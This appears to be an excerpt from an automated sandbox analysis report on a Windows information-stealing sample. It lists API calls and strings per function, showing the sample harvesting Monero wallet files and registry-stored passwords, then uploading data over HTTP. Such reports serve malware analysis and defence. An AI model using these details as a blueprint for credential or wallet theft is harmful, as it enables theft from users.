Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00405C74

Strings

------, xrefs: 00405746
-A, xrefs: 0040566F, 00405D14, 004056F7, 00405700, 0040576E, 004057E5, 004058E3, 00405A24, 00405771, 004057E8, 004058E6, 00405A27
------, xrefs: 004059FC
", xrefs: 00405AC6
-A, xrefs: 00405620, 00405D27, 00405623
------, xrefs: 004058BB
", xrefs: 00405985
J&f, xrefs: 00405878

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$-A$-A$J&f
API String ID: 148854478-1022722094
Opcode ID: 973b8a43593daf1daacf6c7f5fe3cc353c6d700f755c7d0dae3ca370f4ba0e22
Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
Opcode Fuzzy Hash: 973b8a43593daf1daacf6c7f5fe3cc353c6d700f755c7d0dae3ca370f4ba0e22
Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
lstrcat.KERNEL32(?,00000000), ref: 0040A510
lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
lstrcat.KERNEL32(?,00000000), ref: 0040A532
lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
lstrcat.KERNEL32(?,00000000), ref: 0040A554
lstrcat.KERNEL32(?,0041DA94), ref: 0040A563

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
lstrlen.KERNEL32(?), ref: 0040A605
lstrlen.KERNEL32(?), ref: 0040A614
memset.MSVCRT ref: 0040A65D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

DeleteFileA.KERNEL32(00000000), ref: 0040A689

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: 4724f57c80c5ccb517ebe5cb1bf81a9d293302537db6e20a181496a60ca8227d
Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
Opcode Fuzzy Hash: 4724f57c80c5ccb517ebe5cb1bf81a9d293302537db6e20a181496a60ca8227d
Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,042F7D68,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
lstrcat.KERNEL32(?,00000000), ref: 0040C958
lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
lstrcat.KERNEL32(?,00000000), ref: 0040C97A
lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
lstrcat.KERNEL32(?,00000000), ref: 0040C99C
lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
lstrcat.KERNEL32(?,00000000), ref: 0040CA02
lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
lstrcat.KERNEL32(?,00000000), ref: 0040CA24
lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(?), ref: 0040CA7A
lstrlen.KERNEL32(?), ref: 0040CA89
memset.MSVCRT ref: 0040CAD2

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

DeleteFileA.KERNEL32(00000000), ref: 0040CAFE

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: c8164160b88f97020f9c5aff05177b0a5368b1f620fec4bba8d6403bb6f38b9b
Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
Opcode Fuzzy Hash: c8164160b88f97020f9c5aff05177b0a5368b1f620fec4bba8d6403bb6f38b9b
Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404540 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
StrCmpCA.SHLWAPI(?,042F0A68), ref: 004045FA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,042F0A98), ref: 00404AA8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
InternetCloseHandle.WININET(00000000), ref: 00404B6D
InternetCloseHandle.WININET(00000000), ref: 00404B85
HttpOpenRequestA.WININET(00000000,042F0A48,?,042F84A0,00000000,00000000,00400100,00000000), ref: 004047D5

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00404B8F

Strings

------, xrefs: 004047E8
------, xrefs: 00404929
------, xrefs: 0040467D
", xrefs: 004048B2
", xrefs: 004049F3
J&f, xrefs: 004047A5

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------$J&f
API String ID: 460715078-2398766951
Opcode ID: f878f56f84ba45d93086740d51afd7e7722ca98a989a2cce51332dd5e7a994cd
Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
Opcode Fuzzy Hash: f878f56f84ba45d93086740d51afd7e7722ca98a989a2cce51332dd5e7a994cd
Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

RegOpenKeyExA.KERNEL32(00000000,042F3428,00000000,00020019,00000000,0041D289), ref: 00414B41
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

- , xrefs: 00414D40
%s\%s, xrefs: 00414BEA
?, xrefs: 00414B17

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 5006b39ac59f030e58fb0d02e9c357e1868f6499d590eaa67df8c9110744e5f6
Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
Opcode Fuzzy Hash: 5006b39ac59f030e58fb0d02e9c357e1868f6499d590eaa67df8c9110744e5f6
Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F667
strtok_s.MSVCRT ref: 0040FA8F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: bfa52de86468f06c75ce6d1a715682b1cd9076c0a6941fb9bd0619d7694f907c
Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
Opcode Fuzzy Hash: bfa52de86468f06c75ce6d1a715682b1cd9076c0a6941fb9bd0619d7694f907c
Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004012E7

Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF

lstrcat.KERNEL32(?,00000000), ref: 0040130F
lstrlen.KERNEL32(?), ref: 0040131C
lstrcat.KERNEL32(?,.keys), ref: 00401337

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,042F7D68,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

DeleteFileA.KERNEL32(00000000), ref: 004014A9
memset.MSVCRT ref: 004014D0

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9

Strings

SOFTWARE\monero-project\monero-core, xrefs: 004012F5
.keys, xrefs: 0040132B
\Monero\wallet.keys, xrefs: 0040134D
wallet_path, xrefs: 004012F0

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2054947926-218353709
Opcode ID: 33848626fbaf5211245e59cc062cba06af5fe8c0e6f0d2c77249055f748380b4
Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
Opcode Fuzzy Hash: 33848626fbaf5211245e59cc062cba06af5fe8c0e6f0d2c77249055f748380b4
Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

lstrcat.KERNEL32(3095D020,0041DEB8), ref: 00406FD6
lstrcat.KERNEL32(3095D020,00000000), ref: 00407018
lstrcat.KERNEL32(3095D020, : ), ref: 0040702A
lstrcat.KERNEL32(3095D020,00000000), ref: 0040705F
lstrcat.KERNEL32(3095D020,0041DEC0), ref: 00407070
lstrcat.KERNEL32(3095D020,00000000), ref: 004070A3
lstrcat.KERNEL32(3095D020,0041DEC4), ref: 004070BD
task.LIBCPMTD ref: 004070CB

Strings

`v@, xrefs: 00406FAF, 004070C8, 00406FFE, 00407034, 0040707C, 00407045, 00406FB2
: , xrefs: 0040701E
h0A, xrefs: 00406FA6, 00406FA9

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: : $`v@$h0A
API String ID: 3191641157-3559972273
Opcode ID: 22c65c759e4008ac886b6aeda8a47d70719bcccf3909e077351c77a1654b374d
Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
Opcode Fuzzy Hash: 22c65c759e4008ac886b6aeda8a47d70719bcccf3909e077351c77a1654b374d
Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00415710 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 00415836

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: ebc458d2954fa87928cbffb1aa81fa40cba8a6fc2b0c4bc732e2d226e351cda2
Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
Opcode Fuzzy Hash: ebc458d2954fa87928cbffb1aa81fa40cba8a6fc2b0c4bc732e2d226e351cda2
Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
InternetCloseHandle.WININET(c.A), ref: 00404D75
InternetCloseHandle.WININET(?), ref: 00404D82

Strings

c.A, xrefs: 00404D71, 00404CFD, 00404D00, 00404D74
c.A, xrefs: 00404CC1, 00404DA0

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID: c.A$c.A
API String ID: 3066467675-270182787
Opcode ID: ff34e455916cb5254e18773c9340263e729f543755462a643926861e0345f7f7
Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
Opcode Fuzzy Hash: ff34e455916cb5254e18773c9340263e729f543755462a643926861e0345f7f7
Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406CE4
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B

task.LIBCPMTD ref: 00406F25

Strings

Password, xrefs: 00406DD1

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
